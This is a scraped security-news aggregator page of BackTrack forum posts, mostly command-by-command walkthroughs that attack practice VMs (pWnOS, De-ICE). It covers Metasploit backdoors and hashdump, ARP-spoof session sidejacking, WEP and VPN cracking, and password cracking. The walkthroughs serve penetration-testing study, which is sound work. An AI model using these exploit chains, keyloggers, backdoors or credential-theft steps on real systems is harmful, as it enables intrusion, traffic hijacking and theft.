avialiable for the commands,or any websites
Feeds
267702 items (579 unread) in 27 feeds
-
0day.today (was: 1337day, Inj3ct0r, 1337db) (573 unread)
-
OSVDB Vulnerabilities
-
Exploit-DB
-
SecurityFocus Vulnerabilities
-
Bugtraq
-
Full Disclosure
-
XSSed
-
Packet Storm Security Headlines (6 unread)
-
-
-
-
-
-
Sophos security news
-
-
Penetration Testing
-
SecuriTeam
-
BackTrack Linux Forums
-
Threatpost
-
SecDocs
-
carnal0wnage.attackresearch.com
-
Carnal0wnage
-
-
Darknet
-
The Exploitant
-
Hack a Day
-
Wirevolution
«
Expand/Collapse
28 items tagged "Howto"
Related tags: nbsp [+], quot [+], blip tv [+], heorot [+], video [+], root [+], ice [+], BackTrack [+], wireless cards [+], virtualbox [+], tutorial [+], read [+], linux [+], hxxp [+], don [+], card [+], bt4 [+], bt3 [+], anyone [+], Wireless [+], ziggy marley [+], x protocol [+], wpa wpa2 [+], wpa [+], word list [+], word [+], wlan [+], wiki [+], wep [+], webfilter [+], web filter [+], vulnerability identification [+], vmx [+], vicky devine facing [+], usb enclosure [+], usb [+], una [+], type [+], tmi [+], thc pptp bruter [+], tempo fa [+], tar [+], suceed [+], ssl certs [+], ssh [+], sqlite [+], snapshot [+], sidejacking [+], shared folders [+], server [+], script kiddy [+], router [+], root id [+], rip index [+], reference book [+], priority 1 [+], porta 80 [+], play ground [+], perpose [+], pentest [+], penetration test [+], password [+], omni antenna [+], neighborhood [+], nbsp nbsp nbsp nbsp nbsp [+], mr. oizo [+], list [+], linux os [+], kate [+], iwconfig [+], interval [+], internet [+], instal [+], img [+], iam [+], hydra [+], hi folks [+], help [+], hamster [+], grub [+], google [+], fatal server error [+], extentions [+], ethernet [+], essid [+], error [+], english thanks [+], encrypted files [+], dsl [+], dongle [+], disk [+], dhclient [+], decrypt [+], collaborative debugging tool [+], che [+], chap [+], cd tools [+], cd test [+], cat shadow [+], cat group [+], c drive [+], bypass [+], bruteforce attack [+], bozza [+], boot ini [+], biscotte [+], beta [+], berlin [+], backtrack linux [+], attacker [+], asleap [+], arpspoof [+], airoway [+], airodump [+], aircrack [+], aes [+], access c [+], access [+], Newbie [+]
-
13:37
How to use the backtrack4 commands?
» remote-exploit & backtrack -
How to enable internet sharing in BT4??
» remote-exploit & backtrack -
How To Bypass Webfilter ?
» remote-exploit & backtrackHi
Would anyone care to explain to me how web filter Work and i go about it to bypass them... Anyone have a Video link or a tutorial...
But i don't only want a quick fix... I would like to understand it and grasp the concept... Don't wanna be another Script kiddy on the play ground.
Thank you:DTags: anyone bypass webfilter don script-kiddy web-filter play-ground BackTrack Howto
-
how to connect Backtrack with DSL network....?
» remote-exploit & backtrack -
[Video] Attacking - pWnOS
» remote-exploit & backtrackLinks
Watch on-line: http://g0tmi1k.blip.tv/file/3388825
Download: http://www.mediafire.com/?5gggmmmycjm
Commands:http://pastebin.com/2Eq1zG88
What is this?
This is my walk though of how I broke into pWnOS v1.
pWnOS is on a "VM Image", that creates a target on which to practice penetration testing; with the "end goal" is to get root. It was designed to practice using exploits, with multiple entry points
Scenario
A company dedicated to serving Webhosting hires you to perform a penetration test on one of its servers dedicated to the administration of their systems.
It's a linux virtual machine intentionally configured with exploitable services to provide you with a path to r00t. :)
What do I need?
> BackTrack 4 (Final)
> pWnOS.vmdk
> exploit-db.com or milw0rm.
Software
Name: pWnOS
Version: 1
Home Page: http://0dayclub.com/files/pWnOS%20v1.0.zip
Download Link:- http://www.mediafire.com/file/ec3hmlzuyzy/pWnOS v1.0.part1.rar
- http://www.mediafire.com/file/yngwzqkxmin/pWnOS v1.0.part2.rar
- http://www.mediafire.com/file/htmqm3dzgya/pWnOS v1.0.part3.rar
- http://www.0dayclub.com/public/index...nOS%20v1.0.zip
- http://krash.in/bond00/new/pWnOS%20v1.0.zip
- http://0dayclub.com/files/pWnOS%20v1.0.zip
Commands:
Code:nmap 192.168.3.1-255
nmap -sV -sS -O 192.168.3.100
firefox http://192.168.3.100
firefox http://192.168.3.100:10000
firefox -> milw0rm/explo.it -> search "Webmin" -> save. Filename: webmin.pl/php
*Webmin <> save. Filename: shadow
firefox -> milw0rm/explo.it -> search "Debian OpenSSL" -> save. Filename: ssh.py/rb
*Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit*
http://milw0rm.com/exploits/5622 (perl)
http://milw0rm.com/exploits/5720 (python)
http://milw0rm.com/exploits/5632 (ruby)
http://www.exploit-db.com/exploits/5622 (perl)
http://www.exploit-db.com/exploits/5720 (python)
http://www.exploit-db.com/exploits/5632 (ruby)
wget http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
perl webmin.pl 192.168.3.100 10000 /home/vmware/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/obama/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/osama/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/yomama/.ssh/authorized_keys
tar jxvf debian_ssh_rsa_2048_x86.tar.bz
cd rsa/2048
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw rsa/2048/*.pub
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ rsa/2048/*.pub
*scans for the public key...*
ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.3.100
exit
ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.3.100
hostname
uname -a
firefox -> milw0rm/explo.it -> search "Linux Kernel 2.6" -> save. Filename: vmsplice.c
*Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit*
http://milw0rm.com/exploits/5092 (c)
http://www.exploit-db.com/exploits/5092 (c)
nano vmsplice.c
gcc vmsplice.c -o vmsplice
./vmsplice
whoami
----------------------------------------------------------------------------------------------------
Users
root: root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
vmware: vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama: obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama: osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama: yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
----------------------------------------------------------------------------------------------------
Notes:
I had problems with the Debian OpenSSH/OpenSSL exploit, some times it would work, else it would be really slow or just cant find the correct exploit file. The method which I use, turns it into a offline attack, which makes it more stealthy as it will not log failed logins (e.g. /var/auth/auth.log. See here for reading it). It relies on the default path tho!
This is one method of getting in, the author did say that there is multiple ways in!
It took me a bit of work to also to get it to work with virtual box & static IP addresses.
Read my post here (short answer - need configure another interface via another OS)
Song: Deadmau5 - Faxing Berlin
Video length: 07:37
Capture length: 14:55
Blog Post: http://g0tmi1k.blogspot.com/2010/04/video-pwnos.html
Forum Post: http://forums.heorot.net/viewtopic.php?f=21&t=391&p=1956#p1956 or http://www.backtrack-linux.org/forums/backtrack-videos/2748-%5Bvideo%5D-attacking-pwnos.html#post9217
~g0tmi1kTags: nbsp ssh quot read berlin blip-tv penetration-test heorot BackTrack Howto
- http://www.mediafire.com/file/ec3hmlzuyzy/pWnOS v1.0.part1.rar
-
[Video] Messing with Metasploit
» remote-exploit & backtrackLinks
Watch on-line: http://g0tmi1k.blip.tv/file/3308154
Download :http://www.mediafire.com/?m12dyljmmje
Commands:http://pastebin.com/9kygLiRe
What is this?
A basic guide to show how powerful the metasploit framework is!>Setup & run a exploit.
What do I need?
>Use nmap to scan.
>Use db_autopwn (to exploit the masses!)
>Gather information about the target
>Read, download and upload files
>Run scripts
>Create & use a backdoor.
> Metasploit Framework
> (Vulnerable) target (e.g. Windows XP SP0/1)
Software
Name: Metasploit
Version: 3.3.3
Home Page: http://www.metasploit.com/
Download Link: http://www.metasploit.com/framework/download/
Commands:
Code:cd /pentest/exploits/framework3/
./msfconsole
db_create g0tmi1k
db_hosts
db_add_host 10.0.0.4
db_hosts
#show ##Show everything! [wasn't in video]
use windows/smb/ms06_040_netapi
#use windows/dcerpc/ms03_026_dcom ##Different exploit, didn't find it as reliable
#set paypload windows/shell_bind_tcp ##Could do a windows shell (not as powerful as meterpreter)
#set payload windows/meterpreter/reverse_tcp ##Could do a meterpreter (but we do it later!)
set payload windows/vncinject/bind_tcp
show options
set lhost 10.0.0.6
show options
exploit
db_del_host 10.0.0.4
db_hosts
db_nmap -n 1O 10.0.0.1-5
db_hosts
db_autopwn -t -p -e
sessions -l
sessoins -i 1
sysinfo
#ipconfig ##IP information [wasn't in video]
idletime
ps
kill [number]
getuid
#migrate // getsystem // use priv ##If the exploit doesn't have system privileges! [wasn't in video]
hashdump
# execute ## Runs a command [wasn't in video]
shell
pwd
ls
cd C:/
ls
mkdir g0tmi1k
ls
cd g0tmi1k
cat C:/boot.ini
download C:/boot.ini /tmp/boot.ini
./msfpayload windows/meterpreter/reverse_tcp lhost=10.0.0.6 X > /tmp/g0tmi1k.exe
upload /tmp/g0tmi1k.exe C:/g0tmi1k/g0tmi1k.exe
run getgui -u g0tmi1k -p haveyou
run keylogrecorder
## More scripts: /pentest/exploits/framework3/scripts/meterpreter
#run scraper ##Gets information about target, dumps reg etc[wasn't in video]
#run vnc ##Setups VNC [wasn't in video]
#run uploadexec ##Upload and run a program [wasn't in video]
clearev
exit -y
exit -y
##Start fresh for the backdoor!
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.6
exploit
## Somehow run: C:\g0tmi1k\g0tmi1k.exe
Notes:
Made a few slip-ups in the video and something went wrong with keylogrecorder.
This is only the basic stuff - it can do ALOT more! See commands for a few more basic things which I didnt do.
Song: Vicky Devine - Facing The Truth
Video length: 9:07
Capture length: 29:20
Blog Post: http://g0tmi1k.blogspot.com/2010/03/...etasploit.html
Forum Post:
~g0tmi1kTags: nbsp video tmi read vicky-devine---facing blip-tv boot-ini nbsp-nbsp-nbsp-nbsp-nbsp BackTrack Howto
-
[Video] Session Sidejacking (Ferret and Hamster)
» remote-exploit & backtrackLinks
Watch video on-line: http://g0tmi1k.blip.tv/file/3288793
Download video: http://www.mediafire.com/?4mouo2krmzy
Commands: http://pastebin.com/dEt7SAcS
What is this?
This videos demos, how to "Session Sidejacking". Sidejacking is where you clone your targets cookies therefore your "sharing" their identity for that account (without ever knowing the username or password)!
What do I need?
> arpspoof
> sslstrip
> Hamster (and Ferret)
*all in BackTrack 4 Final*
Software
Name: arpspoof (DSniff)
Version: 2.3
Home Page: http://www.monkey.org/~dugsong/dsniff/
Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz
Name: sslstrip
Version: 0.6
Home Page: http://www.thoughtcrime.org/software...rip/index.html
Download Link: http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz
Name: Hamster Sidejacking Tool
Version: 2.0
Home Page: http://hamster.erratasec.com/
Download Link: http://hamster.erratasec.com/downloa...er-2.0.0.tar.z
Commands:
Code:echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.104 192.168.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -p -k -f
/pentest/sniffers/hamster/ferret -i eth0
/pentest/sniffers/hamster/hamster
Konqueror -> Settings -> Configure Konqueror -> Proxy -> Manually. 127.0.0.1:1234
Konqueror -> http://hamster
Notes:
Song: Soulwax - Bonkers (As Heard On Radio Soulwax Edit)
Video length: 2:39
Capture length: 3:42
Blog Post: http://g0tmi1k.blogspot.com/2010/03/video-session-sidejacking-ferret-and.html
Forum Post:
~g0tmi1kTags: sidejacking video hamster blip-tv rip-index arpspoof BackTrack Howto
-
[Video] Cracking WiFi - WEP with a client (aircrack-ng)
» remote-exploit & backtrackLinks
Watch video on-line: http://g0tmi1k.blip.tv/file/3129452
Download video: http://www.mediafire.com/?vtynwngzwvy
Commands: http://pastebin.com/TAAUw36Y
What is this?
Yet another video on "How to crack WEP".
How does this work?
ARP beacon is needed (depending on the attack method), so this can be re‐injected back into the network. To get this packets the attacker needs to disconnect a connected client currently on the network (if the attacker keeps on repeating this part, it will be a DoS to the client).
Once the key beacon has been captured and enough data injected/collected, it is now an offline attack either by brute force or a dictionary attack. Then its just a question of waiting then the attacker will have the key (brute forcing WEP can be less than 60 seconds!)
From here, the attacker can use that key to decrypt the captured data from before, and now is able to read it as well as join the network.
What do I need?
> Aircrack-ng suite
> WiFi card that supports monitor mode & injection
Software
Name: Aircrack-ng
Version: 1.0-rc3
Home Page: http://www.aircrack-ng.org/doku.php
Download Link: http://download.aircrack-ng.org/airc...1.0-rc3.tar.gz
Commands:
Code:airmon-ng stop mon0Notes:
airmon-ng start wlan0
airodump-ng --channel 8 --write output --bssid 00:19:5B:E7:52:70 mon0
aireplay-ng --arpreplay -e g0tmi1k -b 00:19:5B:E7:52:70 -h 00:12:17:94:90:0D mon0
aireplay-ng --deauth 10 -a 00:19:5B:E7:52:70 -c 00:12:17:94:90:0D mon0
aircrack-ng output*.cap
ifconfig wlan0 down
iwconfig wlan0 essid g0tmi1k
iwconfig wlan0 key 59EF19C76A
ifconfig wlan0 up
dhclient wlan0
If you want WPA/WPA2 PSK (with a hidden SSID) - See: http://g0tmi1k.blogspot.com/2009/07/...k-wpawpa2.html
Song: Mr. Oizo - Flat Beat
Video length: 03:50
Capture length: 07:23
Blog Post: http://g0tmi1k.blogspot.com/2010/03/...th-client.html
Forum Post: http://forums.remote-exploit.org/
~g0tmi1kTags: video attacker wlan mr.-oizo wpa-wpa2 blip-tv airodump BackTrack Howto
-
[Video] Cracking VPNs (asleap and THC-pptp-bruter)
» remote-exploit & backtrackLinks
Watch on-line: http://g0tmi1k.blip.tv/file/3356422
Download: http://www.mediafire.com/?qzncjwamjix
Commands: http://pastebin.com/RuaqiV6L
Script (chap2asleap.py): http://www.mediafire.com/?yng1zmkxuem
What is this?
This video demostrates an offline (asleap) and online (THC-pptp-bruter) attack on MSCHAP v2 software VPN.
What do I need?
> asleap
> wireshark
> chap2asleap.py & python
> THC-pptp-bruter
> VPN
Software
Name: asleap
Version: 2.2
Home Page: http://www.willhackforsushi.com/Asleap.html
Download Link: http://www.willhackforsushi.com/code...asleap-2.2.tgz
Name: THC-pptp-bruter
Version: 0.1.4
Home Page: http://freeworld.thc.org
Download Link: http://freeworld.thc.org/download.ph...r-0.1.4.tar.gz
Name: chap2asleap.py
Version: 1.0
Home Page: http://g0tmi1k.blogspot.com
Download Link: http://www.mediafire.com/?yng1zmkxuem
Commands:
Code:echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth1 -t 10.0.0.3 10.0.0.9
arpspoof -i eth1 -t 10.0.0.9 10.0.0.3
wireshark -i eth1 -k
python chap2asleap.py
python chap2asleap.py -u g0tmi1k -c 3fb0e397540e8aa3df5eb08b0053092c -r df7661696051401f7192726630558ac200000000000000003c4b7c76ae82dd3050006c53d0bc6012db000acba0c5fec600 -x -v
cd /pentest/passwords/wordlists.lst
cat darkc0de.lst | thc-pptp-bruter -u g0tmi1k -n 99 -l 999 10.0.0.3
Notes:
More information about the script - http://g0tmi1k.blogspot.com/2010/03/...2asleappy.html
Song: Two Fingers - Keman Rhythm
Video length: 03:03
Capture length: 5:48
Blog Post: http://g0tmi1k.blogspot.com/2010/03/...-thc-pptp.html
Forum Post: http://www.backtrack-linux.org
~g0tmi1kTags: thc-pptp-bruter chap asleap blip-tv backtrack-linux BackTrack Howto
-
9:01 Howto Decrypt AES Encrypted Files?
» darkc0deHowto Decrypt AES Encrypted Files?Tags: Howto aes decrypt encrypted-files
-
how to instal airoway.sh
» remote-exploit & backtrack -
new senario of cracking wep i need help plz.
» remote-exploit & backtracki have d-link dwl 2100 ap connected to biquied patch using low-loss coxial cable it works like charm can this be done to usb dongle so that i can put the antenna which comes with the dongle far to get better range or to extend it.if yes how long the coxial cable should be.the usb dongle gives 17dbm connected 2 dbi omni antenna.?
if that can't be done.i have d-link dwl-2100 ap it acts as repeater also but thing is that you should put the root wep. i need to crack the root acess point wep.using my acess point as repeater then seat near my acess point with dongle connected to laptop.i have permission from my uncle(the root acess point is for my uncle) to do that.i wanna do this for eductianal perpose only. not for illegeal activites so i'm wondering is there a way to do that?
and one thing since d-link is an wirless acess point can i use it instead of usb dongle to crack wep ?i have permisson like i said before. any info would be helpeful. thanks man
i gooogle that and search in fourms too much but can't find answers for those question.
i'm familiar with BT3,BT4 prefinal ,BT4 final,unbunte,ophcrack.
before i finish on bt3 i got pwr in airodump-ng and in bt4 pre final but in bt4 it's zero why?is there anything to do to fix that? i have driver zd1211rw.Tags: wep dongle usb omni-antenna bt4 perpose BackTrack Howto
-
showing wordlist from hdd
» remote-exploit & backtrackhi. i have 2gb word list for cracking wpa and also i have 1gb ram and i can not copy word list to backtrack home.(im using backtrack from usb flash disk) i want to show word list to aircrack from my hdd (it is hda1) how do i do that. i tried this command
aircrack-ng -a 1 -b (essid) -w /dev/hda1/word.lst essid.cap
also tried
aircrack-ng -a 1 -b (essid) -w /media/hda1/word.lst essid.cap.
and last,
is there any usefull document for airolib-ng
sorry for my english
thanks.Tags: list word essid english-thanks word-list BackTrack Howto
-
how to crack unsecured network USING backtrack?
» remote-exploit & backtrackwell the problem that i cannot connect to neighborhood wirless even it unsecured network no key needs, but i cannot connect and good signal? is there any trick using backtrackk and thx yaTags: BackTrack neighborhood BackTrack Howto
-
[Video] Complete Network - De-ICE.net v2.0 (1.110) {Level 2-Disk 1}
» remote-exploit & backtrackLinks
Watch video on-line: De-ICE v2.0 (1.100)
Download video: g0tmi1k - De-ICE v2.0 (1.100) [HD].mp4 - de-ice,g0tmi1k
Commands: Bash pastebin - collaborative debugging tool
What is this?
This is my walk though of how I broke into the De-ICE.net network, level 2, disk 1.
The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.
What do I need?
> BackTrack 4 (Final)
> de-ice.net-2.100-1.1.iso (MD5: 09798f85bf54a666fbab947300f38163)
> Dictionary(s)
Software
Name: De-ICE.net
Version: 2.0 (Level 1 - Disk 2 - IP Address: 1.100)
Home Page: http://www.de-ice.net or Heorot.net » De-ICE PenTest LiveCDs Project
Download Link:
- http://heorot.net/instruction/tutori...-2.100-1.1.iso
- de-ice.net-2.100-1.1.part1.rar
- de-ice.net-2.100-1.1.part2.rar
WiKi/Support: De-ICE.net PenTest Disks - Hackerpedia
Commands:
Code:nmap -n 192.168.2.1-255
nmap -n -sV -sS -O 192.168.2.100
nmap -n -sV -sS -O 192.168.2.101
firefox 192.168.2.100
[+]kate -> list of possible usernames. Save. Filename: usernames.txt
firefox 192.168.2.101
[+]BackTrack -> Vulnerability Identification -> Fuzzers -> JBroFuzz. Web Directories -> List of usernames (+ root, admin) with '~' infront. -> http://192.168.2.101 -> 80
firefox http://192.168.2.101/~pirrip
[+]kate -> Update usernames with the ones which we got a respond from. Save.
[+]BackTrck -> Web Application Analysis -> Web (frontend) -> nikto2
./nikto.pl -host 192.168.2.101 -r ~pirrip/ -Display 124
firefox http://192.168.2.101/~pirrip/.ssh
// Save both files
mv /root/id_rsa /http://root/.ssh/id_rsa
mv /root/id_rsa.pub /http://root/.ssh/id_rsa.pub
chmod 000 /http://root/.ssh/id_rsa
chmod 000 /http://root/.ssh/id_rsa.pub
ssh pirrip@192.168.2.100
// Yes
mailx
// 3 - we see that havisham passowrd is 'changeme'. 7 - we seen pirrip password is '0l1v3rTw1st'
cd /etc/
vi passwd
// kate -> Update usernames with only valid ones.
vi group
sudo vi shadow
// edit (D, :22,22y, :put, i, root, ESCape, ESCape, d + [->],[up],d d). Save it (:w), exit (:q). Password: 0l1v3rTw1st
su
// Password: 0l1v3rTw1st
cd /root/
ls -a
cd .save/
ls -a
chmod -R 777 /root/
//In BackTrack//
scp pirrip@192.168.2.100:/root/.save/great_expectations.zip /root/
unzip great_expectations.zip
tar xf great_expectations.tar
strings Jan08
//In SSH//
sudo iv /var/mail/havisham
modprobe capability
//In BackTrack//
ftp 192.168.2.100
// Usrename: pirri. Password: 0l1v3rTw1st //
ls -a
//In SSH//
exit
//In BackTrack//
[+]Firefox -> Send a REAL email to: philip.pirrip.ge@gmail.com
// GAME OVER
----------------------------------------------------------------------------------------------------
Users
root:P1ckw1ckP@p3rs root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
havisham:changeme havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
pirrip:0l1v3rTw1st pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch: magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
----------------------------------------------------------------------------------------------------
Notes:
Video length: 09:07
Capture length: 30:35
Song: Ashley Wallbridge - Masquerade (Original Mix)
Blog Post: g0tmi1k: [Video] De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}
Forum Post:
~g0tmi1kTags: nbsp ice root vulnerability-identification heorot root-id BackTrack Howto
-
[Video] Complete Network - De-ICE.net v1.1 (1.100) {Level 1-Disk 2}
» remote-exploit & backtrackLinks
Watch video on-line: De-ICE v1.1 (1.00)
Download video: g0tmi1k - De-ICE v1.1 (1.100) [HD].mp4 - de-ice,g0tmi1k
Commands:Bash pastebin - collaborative debugging tool
What is this?
This is my walk though of how I broke into the De-ICE.net network, level 1, disk 2.
The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.
What do I need?
> BackTrack 4 (Final)
> de-ice.net-1.110-1.1.iso (MD5: a3341316ca9860b3a0acb06bdc58bbc1)
> Dictionary(s)
Software
Name: De-ICE.net
Version: 1.1 (Level 1 - Disk 2 - IP Address: 1.100)
Home Page: http://www.de-ice.net or Heorot.net » De-ICE PenTest LiveCDs Project
Download Link:
Forums/Support: http://forums.heorot.net andHeorot.net • Login
WiKi/Support: De-ICE.net PenTest Disks - Hackerpedia
Commands:
Code:nmap -n 192.168.1.1-255
nmap -n -sS -sV -O 192.168.1.100
firefox 192.168.1.100
[+]kate -> make list of possible usernames. Save. Filename: usernames
// lastF, fLast
hydra 192.168.1.100 ssh2 -L /root/usernames -p password -e s
ssh bbanter@192.168.1.100
// "Yes" if quiz about trusting authenticity. Password: bbanter
cd /etc/
cat passwd
[+]kate -> Update usernames. Save.
cat group
exit
cd /root/tools/dictionary/
cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords
hydra 192.168.1.100 ssh2 -V -l aadams -P /root/passwords
ssh aadams@192.168.1.100
// Password: nostradamus
cd /etc/
sudo cat shadow
// Password: nostradamus
[+]kate -> New -> Paste -> Save. Filename: shadow
exit
john
./john --rules --wordlist=/root/passwords --users=root /root/shadow
// Password: tarot
ssh aadams@192.168.1.100
// Password: nostradamus
su
// Password: tarot
ls -a
cd ..
ls -a
cd ftp
/
ls -a
cd incoming/
ls -a
openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot
cd /etc/
vi vsftpd.conf
// edit (by pressing i) vsftpd.conf to have a '#' in front of 'listen=YES' (last line). Then save it (:w), and exit (:quit)
modprobe capability
exit
exit
ftp 192.168.1.100
// User: root. Password: tarot
ls -a
cd ..
ls -a
cd home
ls -a
cd ftp
ls -a
cd incoming
ls -a
get salary.csv
cd /pentest/passwords/jtr
ls
mv salary.csv ~
[+]kate -> salary.csv
// GAME OVER
----------------------------------------------------------------------------------------------------
Users
root:tarot = root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
aadams:nostradamus = aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:bbanter = bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:hierophant = ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
----------------------------------------------------------------------------------------------------
Notes:
Video length: 04:11
Capture length: 08:52
Song: Eryka Badu & Ziggy Marley - I Luv U (Dubstep Mix)
Blog Post: g0tmi1k: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
Forum Post:
~g0tmi1kTags: nbsp ice root ziggy-marley heorot cat-shadow cat-group BackTrack Howto
-
[Video] Complete Network - De-ICE.net v1.0 (1.110) {Level 1-Disk 1}
» remote-exploit & backtrackLinks
Watch video on-line: De-ICE v1.0 (1.110)
Download video: g0tmi1k - De-ICE v1.0 (1.110) [HD].mp4 - de-ice,g0tmi1k
Commands: Bash pastebin - collaborative debugging tool
What is this?
This is my walk though of how I broke into the De-ICE.net network, level 1, disk 1.
The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.
What do I need?
> BackTrack 4 (Final)
> de-ice.net-1.110-1.0.iso (MD5: a626d884148c63bfc9df36f2743d7242)
> Dictionary(s)
Software
Name: De-ICE.net
Version: 1.0 (Level 1 - Disk 1 - IP Address: 1.110)
Home Page: http://www.de-ice.net or Heorot.net » De-ICE PenTest LiveCDs Project
Download Link:- http://de-ice.hackerdemia.com/lib/ex...netcat-1.0.iso
- http://heorot.net/instruction/tutori...-1.110-1.0.iso
- de-ice.net-1.110-1.0.zip
WiKi/Support: De-ICE.net PenTest Disks - Hackerpedia
Commands:
Code:nmap -n 192.168.1.1-255
nmap -n -sS -sV -O 192.168.1.110
firefox 192.168.1.110
[+]kate -> make list of possible usernames
// lastF, fLast
ftp 192.168.1.110
// Username: anonymous. Password: [Blank]
ls -a
cd download
ls -a
cd etc
ls -a
get core
exit
strings core
[+]Copy from 'root:$...' to '[EOF]'. Kate -> New -> Paste. Format so each username is one its own line -> Save. Filename: shadow
cd tools/dictionary/
cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords
john
./john --rules --wordlist=/root/passwords /root/shadow
//Password: root:Complexity & ccofee:Diatomaceous
ssh ccofee@192.168.1.110
//Password: Diatomaceous
ls -a
cd ..
ls -a
cd root/
ls -a
cd .save/
su
//Password: Complexity
cd .save/
ls -a
cat copy.sh
openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw
ls -a
cat customer_account.csv
// GAME OVER
----------------------------------------------------------------------------------------------------
Users
root:Complexity = root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
aadams: = aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
bbanter:Zymurgy = bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
ccoffee:Diatomaceous = ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
----------------------------------------------------------------------------------------------------
Notes:
Video length: 06:57
Capture length: 18:17
Song: Aly & Fila - Khepera
Blog Post: g0tmi1k: [Video] De-ICE.net v1.0 (1.110) {Level 1 - Disk 1}
Forum Post:
~g0tmi1kTags: nbsp ice root kate ssl-certs heorot cd-tools BackTrack Howto
-
Trouble installing BT4 Final from live DVD or USB
» remote-exploit & backtrackHI!!!
Im new to Backtrack,and i have a problem of installing it on my laptop,i downloaded Iso file ,burnt it on DVD
,also made an USB Live on another PC,but on mine ,after reboot with DVD in,i have problem I coudnt start GUi interface,On a first screen i chose something like this "Start Backtrack framebuffer (800x600)" after when everything is loaded i shoud type a STARTX command,so i did that,but I get an error,and nothig happens
That is what i have after typing startx and pressing Enter
BackTrack 4 (PwnSauce) Penetration Testing and Auditing Distribution
root@bt:~# startx
warning; process set to priority -1 instead of requested priority 0
Release Date: 10 October 2008
X Protocol Version 11, Revision 0
Build Operating System: Linux 2.6.24-19-server 1686 Ubuntu ■Current Operating System: Linux bt 2.6.30.9 #l SMP Tue Dec 1 21:51:88 EST 2009 i6
build Date: 09 March 2009 10:48:54AM
xorg-server 2:1.5.2-2ubuntu3.1 (buildd@rothera.buildd)
|Before reporting problems, check http:/wiki.x.org to make sure that you have the latest version.
Module Loader present
Markers: (--) probed, (**) from config file, (==) default setting. (++) from command line, (!!) notice, (II) informational, (WW) warning, (EE) error, (!!) not implemented, (??) unknown.
( = = ) Log file: "/var/log/Xorg.0.log". Time: Thu Feb 11 23:16:26 2010
( = =) Using config file: "Vetc/'Xll/'xorg.conf"
